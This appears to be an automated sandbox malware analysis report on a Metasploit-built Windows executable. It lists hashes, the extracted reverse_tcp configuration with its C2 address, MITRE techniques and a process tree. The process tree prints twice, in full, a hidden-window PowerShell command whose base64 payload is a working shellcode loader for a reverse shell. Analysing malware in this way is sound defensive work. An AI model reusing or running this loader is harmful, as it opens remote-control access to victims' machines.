metasploit | 6d58d411c57b139a09a7ba8909529d5c5caf8d678066ffef0d19b889529e4b39

General

Target

6d58d411c57b139a09a7ba8909529d5c5caf8d678066ffef0d19b889529e4b39N.exe
Size

17KB
MD5

37b3c02b102fd694f736477b9862fdd0
SHA1

48ff7d04054dc85c29a103b53bbe60cb04f48418
SHA256

6d58d411c57b139a09a7ba8909529d5c5caf8d678066ffef0d19b889529e4b39
SHA512

498d8c5ed42ac24aeeffef94081098eccb1245e14a1b3e22414fa867fad89457906c45e0cc63c3f4a34c18817f156fa2703a4ed456c05182f6932fa3b1f2bb14
SSDEEP

384:HEEoLO56ayzcMj+/4y8qYj1jewPbcY5+INel1nfTJYQ:kE8O56lcV/4yrwPbcU+INenfTSQ

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

192.168.1.110:4444

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2804	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2804	powershell.exe
2944	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeDebugPrivilege	2944	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2380 wrote to memory of 2776	2380	6d58d411c57b139a09a7ba8909529d5c5caf8d678066ffef0d19b889529e4b39N.exe	31
PID 2380 wrote to memory of 2776	2380	6d58d411c57b139a09a7ba8909529d5c5caf8d678066ffef0d19b889529e4b39N.exe	31
PID 2380 wrote to memory of 2776	2380	6d58d411c57b139a09a7ba8909529d5c5caf8d678066ffef0d19b889529e4b39N.exe	31
PID 2776 wrote to memory of 2804	2776	cmd.exe	32
PID 2776 wrote to memory of 2804	2776	cmd.exe	32
PID 2776 wrote to memory of 2804	2776	cmd.exe	32
PID 2804 wrote to memory of 2944	2804	powershell.exe	33
PID 2804 wrote to memory of 2944	2804	powershell.exe	33
PID 2804 wrote to memory of 2944	2804	powershell.exe	33
PID 2804 wrote to memory of 2944	2804	powershell.exe	33
PID 2944 wrote to memory of 2720	2944	powershell.exe	34
PID 2944 wrote to memory of 2720	2944	powershell.exe	34
PID 2944 wrote to memory of 2720	2944	powershell.exe	34
PID 2944 wrote to memory of 2720	2944	powershell.exe	34
PID 2720 wrote to memory of 2548	2720	csc.exe	35
PID 2720 wrote to memory of 2548	2720	csc.exe	35
PID 2720 wrote to memory of 2548	2720	csc.exe	35
PID 2720 wrote to memory of 2548	2720	csc.exe	35

C:\Users\Admin\AppData\Local\Temp\6d58d411c57b139a09a7ba8909529d5c5caf8d678066ffef0d19b889529e4b39N.exe
"C:\Users\Admin\AppData\Local\Temp\6d58d411c57b139a09a7ba8909529d5c5caf8d678066ffef0d19b889529e4b39N.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAAwADAAOAAgAD0AIAAnACQAOABBADIAQgAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJAA4AEEAMgBCACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAOAAsADAAeAAyADUALAAwAHgANABhACwAMAB4ADgAYgAsADAAeABlADAALAAwAHgAZABiACwAMAB4AGMAYwAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBlACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANAA2ACwAMAB4ADEAMgAsADAAeAAwADMALAAwAHgANAA2ACwAMAB4ADEAMgAsADAAeAA4ADMALAAwAHgAYwBiACwAMAB4AGIANgAsADAAeAA2ADkALAAwAHgAMQA1ACwAMAB4AGUAZgAsADAAeABhAGYALAAwAHgAZQAxACwAMAB4AGQANgAsADAAeAAwAGYALAAwAHgAMwAwACwAMAB4ADkAZQAsADAAeABlADcALAAwAHgAZABkACwAMAB4AGIAOQAsADAAeABiAGIALAAwAHgANgBjACwAMAB4ADYAYQAsADAAeABlAGIALAAwAHgANwAzACwAMAB4AGUANgAsADAAeAAzAGUALAAwAHgAMAAwACwAMAB4AGYAZgAsADAAeABhAGEALAAwAHgAYQBhACwAMAB4ADEANwAsADAAeAA0ADgALAAwAHgAMAAwACwAMAB4AGYANAAsADAAeABhAGMALAAwAHgAYwA0ACwAMAB4AGIAZAAsADAAeABjADkALAAwAHgANABkACwAMAB4ADEAOQAsADAAeAA3AGUALAAwAHgAOAA1ACwAMAB4ADgAZQAsADAAeAAzAGIALAAwAHgAMAAyACwAMAB4AGQANwAsADAAeABjADIALAAwAHgAOQBiACwAMAB4ADMAYgAsADAAeAAxADgALAAwAHgAMQA3ACwAMAB4AGQAZAAsADAAeAA3AGMALAAwAHgAZQBmACwAMAB4ADUAZAAsADAAeAAzADIALAAwAHgAZAAwACwAMAB4AGIAOAAsADAAeAAxADYALAAwAHgAOQBlACwAMAB4AGMANQAsADAAeABjAGQALAAwAHgANgBiACwAMAB4ADIAMwAsADAAeABlADcALAAwAHgAMAAxACwAMAB4AGUAMAAsADAAeAAxAGIALAAwAHgAOQBmACwAMAB4ADIANAAsADAAeAAzADcALAAwAHgAZQBmACwAMAB4ADEAMwAsADAAeAAyADcALAAwAHgANgA4ACwAMAB4ADkAYgAsADAAeABmADQALAAwAHgAMAA3ACwAMAB4AGQAOAAsADAAeAAxADcALAAwAHgANABjACwAMAB4ADUAZgAsADAAeABkADkALAAwAHgAZgA0ACwAMAB4AGMAOAAsADAAeAA5ADYALAAwAHgAYQBkACwAMAB4AGMANgAsADAAeABlADMALAAwAHgAZAA3ACwAMAB4ADAANwAsADAAeABiAGMALAAwAHgAMwAwACwAMAB4AGEAYwAsADAAeAA5ADkALAAwAHgAMQA0ACwAMAB4ADAAOQAsADAAeAA3ADIALAAwAHgAMwA1ACwAMAB4ADUAOQAsADAAeABhADUALAAwAHgANwBmACwAMAB4ADQANwAsADAAeAA5AGQALAAwAHgAMAAyACwAMAB4ADkAZgAsADAAeAAzADIALAAwAHgAZAA1ACwAMAB4ADcAMAAsADAAeAAyADIALAAwAHgANAA1ACwAMAB4ADIAZQAsADAAeAAwAGEALAAwAHgAZgA4ACwAMAB4AGMAMAAsADAAeABiADEALAAwAHgAYQBjACwAMAB4ADgAYgAsADAAeAA3ADMALAAwAHgAMQA2ACwAMAB4ADQAYwAsADAAeAA1ADgALAAwAHgAZQA1ACwAMAB4AGQAZAAsADAAeAA0ADIALAAwAHgAMQA1ACwAMAB4ADYAMQAsADAAeABiADkALAAwAHgANAA2ACwAMAB4AGEAOAAsADAAeABhADYALAAwAHgAYgAxACwAMAB4ADcAMwAsADAAeAAyADEALAAwAHgANAA5ACwAMAB4ADEANgAsADAAeABmADIALAAwAHgANwAxACwAMAB4ADYAZQAsADAAeABiADIALAAwAHgANQBlACwAMAB4ADIAMgAsADAAeAAwAGYALAAwAHgAZQAzACwAMAB4ADMAYQAsADAAeAA4ADUALAAwAHgAMwAwACwAMAB4AGYAMwAsADAAeABlADMALAAwAHgANwBhACwAMAB4ADkANQAsADAAeAA3AGYALAAwAHgAMAAxACwAMAB4ADYAZAAsADAAeABhADkALAAwAHgANwBmACwAMAB4AGQAOQAsADAAeAA5ADIALAAwAHgAZgA3ACwAMAB4ADEANwAsADAAeAAxADUALAAwAHgANQBlACwAMAB4ADAAOAAsADAAeABlADgALAAwAHgAMwAxACwAMAB4AGUAOQAsADAAeAA3AGIALAAwAHgAZABhACwAMAB4ADkAZQAsADAAeAA0ADEALAAwAHgAMQA0ACwAMAB4ADUANgAsADAAeAA1ADYALAAwAHgANABmACwAMAB4AGUAMwAsADAAeABlAGYALAAwAHgANwAwACwAMAB4ADcAMAAsADAAeAAzAGIALAAwAHgANQA3ACwAMAB4ADEAMAAsADAAeAA4AGYALAAwAHgAYgBjACwAMAB4AGEAOAAsADAAeAAzADgALAAwAHgANABiACwAMAB4AGUAOAAsADAAeABmADgALAAwAHgANQAyACwAMAB4ADcAYQAsADAAeAA5ADEALAAwAHgAOQAyACwAMAB4AGEAMgAsADAAeAA4ADMALAAwAHgANAA0ACwAMAB4ADAAZQAsADAAeABhADkALAAwAHgAMQAzACwAMAB4AGEANwAsADAAeAA2ADcALAAwAHgAYQBjACwAMAB4ADgAZAAsADAAeAA0AGYALAAwAHgANwBhACwAMAB4AGEAZgAsADAAeAA0ADAALAAwAHgAYwBjACwAMAB4AGYAMwAsADAAeAA0ADkALAAwAHgAMwAyACwAMAB4AGIAYwAsADAAeAA1ADMALAAwAHgAYwA2ACwAMAB4AGYAMgAsADAAeAA2AGMALAAwAHgAMQA0ACwAMAB4AGIANgAsADAAeAA5AGEALAAwAHgANgA2ACwAMAB4ADkAYgAsADAAeABlADkALAAwAHgAYgBhACwAMAB4ADgAOAAsADAAeAA3ADEALAAwAHgAOAAyACwAMAB4ADUAMAAsADAAeAA2ADcALAAwAHgAMgBjACwAMAB4AGYAYQAsADAAeABjAGMALAAwAHgAMQBlACwAMAB4ADcANQAsADAAeAA3ADAALAAwAHgANgBkACwAMAB4AGQAZQAsADAAeABhADMALAAwAHgAZgBjACwAMAB4AGEAZAAsADAAeAA1ADQALAAwAHgANAAwACwAMAB4ADAAMAAsADAAeAA2ADMALAAwAHgAOQBkACwAMAB4ADIAZAAsADAAeAAxADIALAAwAHgAMQAzACwAMAB4ADYAZAAsADAAeAA3ADgALAAwAHgANAA4ACwAMAB4AGIANQAsADAAeAA3ADIALAAwAHgANQA2ACwAMAB4AGUANwAsADAAeAAzADkALAAwAHgAZQA3ACwAMAB4ADUAZAAsADAAeABhAGUALAAwAHgANgBlACwAMAB4ADkAZgAsADAAeAA1AGYALAAwAHgAOQA3ACwAMAB4ADUAOAAsADAAeAAwADAALAAwAHgAOQBmACwAMAB4AGYAMgAsADAAeABkADMALAAwAHgAOAA5ACwAMAB4ADMANQAsADAAeABiAGQALAAwAHgAOABiACwAMAB4AGYANQAsADAAeABkADkALAAwAHgAMwBkACwAMAB4ADQAYgAsADAAeABhADAALAAwAHgAYgAzACwAMAB4ADMAZAAsADAAeAAyADMALAAwAHgAMQA0ACwAMAB4AGUAMAAsADAAeAA2AGQALAAwAHgANQA2ACwAMAB4ADUAYgAsADAAeAAzAGQALAAwAHgAMAAyACwAMAB4AGMAYgAsADAAeABjAGUALAAwAHgAYgBlACwAMAB4ADcAMwAsADAAeABiADgALAAwAHgANQA5ACwAMAB4AGQANwAsADAAeAA3ADkALAAwAHgAZQA3ACwAMAB4AGEAZQAsADAAeAA3ADgALAAwAHgAOAAxACwAMAB4AGMAMgAsADAAeAAyAGUALAAwAHgANAA0ACwAMAB4ADUANAAsADAAeAAyAGEALAAwAHgANAA1ACwAMAB4AGEANAAsADAAeAA2ADQAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAGgAWgBpAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABoAFoAaQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAaABaAGkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAAwADAAOAApACkAOwAkADUAZwA5ACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAYgBtAFcAagAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABiAG0AVwBqACAAJAA1AGcAOQAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAA1AGcAOQAgACQAZQAiADsAfQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -window hidden -EncodedCommand JAAwADAAOAAgAD0AIAAnACQAOABBADIAQgAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJAA4AEEAMgBCACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAOAAsADAAeAAyADUALAAwAHgANABhACwAMAB4ADgAYgAsADAAeABlADAALAAwAHgAZABiACwAMAB4AGMAYwAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBlACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANAA2ACwAMAB4ADEAMgAsADAAeAAwADMALAAwAHgANAA2ACwAMAB4ADEAMgAsADAAeAA4ADMALAAwAHgAYwBiACwAMAB4AGIANgAsADAAeAA2ADkALAAwAHgAMQA1ACwAMAB4AGUAZgAsADAAeABhAGYALAAwAHgAZQAxACwAMAB4AGQANgAsADAAeAAwAGYALAAwAHgAMwAwACwAMAB4ADkAZQAsADAAeABlADcALAAwAHgAZABkACwAMAB4AGIAOQAsADAAeABiAGIALAAwAHgANgBjACwAMAB4ADYAYQAsADAAeABlAGIALAAwAHgANwAzACwAMAB4AGUANgAsADAAeAAzAGUALAAwAHgAMAAwACwAMAB4AGYAZgAsADAAeABhAGEALAAwAHgAYQBhACwAMAB4ADEANwAsADAAeAA0ADgALAAwAHgAMAAwACwAMAB4AGYANAAsADAAeABhAGMALAAwAHgAYwA0ACwAMAB4AGIAZAAsADAAeABjADkALAAwAHgANABkACwAMAB4ADEAOQAsADAAeAA3AGUALAAwAHgAOAA1ACwAMAB4ADgAZQAsADAAeAAzAGIALAAwAHgAMAAyACwAMAB4AGQANwAsADAAeABjADIALAAwAHgAOQBiACwAMAB4ADMAYgAsADAAeAAxADgALAAwAHgAMQA3ACwAMAB4AGQAZAAsADAAeAA3AGMALAAwAHgAZQBmACwAMAB4ADUAZAAsADAAeAAzADIALAAwAHgAZAAwACwAMAB4AGIAOAAsADAAeAAxADYALAAwAHgAOQBlACwAMAB4AGMANQAsADAAeABjAGQALAAwAHgANgBiACwAMAB4ADIAMwAsADAAeABlADcALAAwAHgAMAAxACwAMAB4AGUAMAAsADAAeAAxAGIALAAwAHgAOQBmACwAMAB4ADIANAAsADAAeAAzADcALAAwAHgAZQBmACwAMAB4ADEAMwAsADAAeAAyADcALAAwAHgANgA4ACwAMAB4ADkAYgAsADAAeABmADQALAAwAHgAMAA3ACwAMAB4AGQAOAAsADAAeAAxADcALAAwAHgANABjACwAMAB4ADUAZgAsADAAeABkADkALAAwAHgAZgA0ACwAMAB4AGMAOAAsADAAeAA5ADYALAAwAHgAYQBkACwAMAB4AGMANgAsADAAeABlADMALAAwAHgAZAA3ACwAMAB4ADAANwAsADAAeABiAGMALAAwAHgAMwAwACwAMAB4AGEAYwAsADAAeAA5ADkALAAwAHgAMQA0ACwAMAB4ADAAOQAsADAAeAA3ADIALAAwAHgAMwA1ACwAMAB4ADUAOQAsADAAeABhADUALAAwAHgANwBmACwAMAB4ADQANwAsADAAeAA5AGQALAAwAHgAMAAyACwAMAB4ADkAZgAsADAAeAAzADIALAAwAHgAZAA1ACwAMAB4ADcAMAAsADAAeAAyADIALAAwAHgANAA1ACwAMAB4ADIAZQAsADAAeAAwAGEALAAwAHgAZgA4ACwAMAB4AGMAMAAsADAAeABiADEALAAwAHgAYQBjACwAMAB4ADgAYgAsADAAeAA3ADMALAAwAHgAMQA2ACwAMAB4ADQAYwAsADAAeAA1ADgALAAwAHgAZQA1ACwAMAB4AGQAZAAsADAAeAA0ADIALAAwAHgAMQA1ACwAMAB4ADYAMQAsADAAeABiADkALAAwAHgANAA2ACwAMAB4AGEAOAAsADAAeABhADYALAAwAHgAYgAxACwAMAB4ADcAMwAsADAAeAAyADEALAAwAHgANAA5ACwAMAB4ADEANgAsADAAeABmADIALAAwAHgANwAxACwAMAB4ADYAZQAsADAAeABiADIALAAwAHgANQBlACwAMAB4ADIAMgAsADAAeAAwAGYALAAwAHgAZQAzACwAMAB4ADMAYQAsADAAeAA4ADUALAAwAHgAMwAwACwAMAB4AGYAMwAsADAAeABlADMALAAwAHgANwBhACwAMAB4ADkANQAsADAAeAA3AGYALAAwAHgAMAAxACwAMAB4ADYAZAAsADAAeABhADkALAAwAHgANwBmACwAMAB4AGQAOQAsADAAeAA5ADIALAAwAHgAZgA3ACwAMAB4ADEANwAsADAAeAAxADUALAAwAHgANQBlACwAMAB4ADAAOAAsADAAeABlADgALAAwAHgAMwAxACwAMAB4AGUAOQAsADAAeAA3AGIALAAwAHgAZABhACwAMAB4ADkAZQAsADAAeAA0ADEALAAwAHgAMQA0ACwAMAB4ADUANgAsADAAeAA1ADYALAAwAHgANABmACwAMAB4AGUAMwAsADAAeABlAGYALAAwAHgANwAwACwAMAB4ADcAMAAsADAAeAAzAGIALAAwAHgANQA3ACwAMAB4ADEAMAAsADAAeAA4AGYALAAwAHgAYgBjACwAMAB4AGEAOAAsADAAeAAzADgALAAwAHgANABiACwAMAB4AGUAOAAsADAAeABmADgALAAwAHgANQAyACwAMAB4ADcAYQAsADAAeAA5ADEALAAwAHgAOQAyACwAMAB4AGEAMgAsADAAeAA4ADMALAAwAHgANAA0ACwAMAB4ADAAZQAsADAAeABhADkALAAwAHgAMQAzACwAMAB4AGEANwAsADAAeAA2ADcALAAwAHgAYQBjACwAMAB4ADgAZAAsADAAeAA0AGYALAAwAHgANwBhACwAMAB4AGEAZgAsADAAeAA0ADAALAAwAHgAYwBjACwAMAB4AGYAMwAsADAAeAA0ADkALAAwAHgAMwAyACwAMAB4AGIAYwAsADAAeAA1ADMALAAwAHgAYwA2ACwAMAB4AGYAMgAsADAAeAA2AGMALAAwAHgAMQA0ACwAMAB4AGIANgAsADAAeAA5AGEALAAwAHgANgA2ACwAMAB4ADkAYgAsADAAeABlADkALAAwAHgAYgBhACwAMAB4ADgAOAAsADAAeAA3ADEALAAwAHgAOAAyACwAMAB4ADUAMAAsADAAeAA2ADcALAAwAHgAMgBjACwAMAB4AGYAYQAsADAAeABjAGMALAAwAHgAMQBlACwAMAB4ADcANQAsADAAeAA3ADAALAAwAHgANgBkACwAMAB4AGQAZQAsADAAeABhADMALAAwAHgAZgBjACwAMAB4AGEAZAAsADAAeAA1ADQALAAwAHgANAAwACwAMAB4ADAAMAAsADAAeAA2ADMALAAwAHgAOQBkACwAMAB4ADIAZAAsADAAeAAxADIALAAwAHgAMQAzACwAMAB4ADYAZAAsADAAeAA3ADgALAAwAHgANAA4ACwAMAB4AGIANQAsADAAeAA3ADIALAAwAHgANQA2ACwAMAB4AGUANwAsADAAeAAzADkALAAwAHgAZQA3ACwAMAB4ADUAZAAsADAAeABhAGUALAAwAHgANgBlACwAMAB4ADkAZgAsADAAeAA1AGYALAAwAHgAOQA3ACwAMAB4ADUAOAAsADAAeAAwADAALAAwAHgAOQBmACwAMAB4AGYAMgAsADAAeABkADMALAAwAHgAOAA5ACwAMAB4ADMANQAsADAAeABiAGQALAAwAHgAOABiACwAMAB4AGYANQAsADAAeABkADkALAAwAHgAMwBkACwAMAB4ADQAYgAsADAAeABhADAALAAwAHgAYgAzACwAMAB4ADMAZAAsADAAeAAyADMALAAwAHgAMQA0ACwAMAB4AGUAMAAsADAAeAA2AGQALAAwAHgANQA2ACwAMAB4ADUAYgAsADAAeAAzAGQALAAwAHgAMAAyACwAMAB4AGMAYgAsADAAeABjAGUALAAwAHgAYgBlACwAMAB4ADcAMwAsADAAeABiADgALAAwAHgANQA5ACwAMAB4AGQANwAsADAAeAA3ADkALAAwAHgAZQA3ACwAMAB4AGEAZQAsADAAeAA3ADgALAAwAHgAOAAxACwAMAB4AGMAMgAsADAAeAAyAGUALAAwAHgANAA0ACwAMAB4ADUANAAsADAAeAAyAGEALAAwAHgANAA1ACwAMAB4AGEANAAsADAAeAA2ADQAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAGgAWgBpAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABoAFoAaQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAaABaAGkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAAwADAAOAApACkAOwAkADUAZwA5ACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAYgBtAFcAagAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABiAG0AVwBqACAAJAA1AGcAOQAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAA1AGcAOQAgACQAZQAiADsAfQA=
    3⤵
    - Command and Scripting Interpreter: PowerShell
